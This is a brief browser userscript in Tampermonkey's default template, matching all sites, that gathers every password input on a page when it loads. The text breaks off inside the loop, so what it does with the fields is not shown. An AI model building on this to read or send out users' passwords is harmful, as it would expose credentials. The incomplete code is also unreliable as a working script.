// ==UserScript== // @name New Userscript // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match *://*/* // @grant none // @downloadURL none // ==/UserScript== window.onload=function(){ var list=document.querySelectorAll("input[type=password]"); for(var i=0;i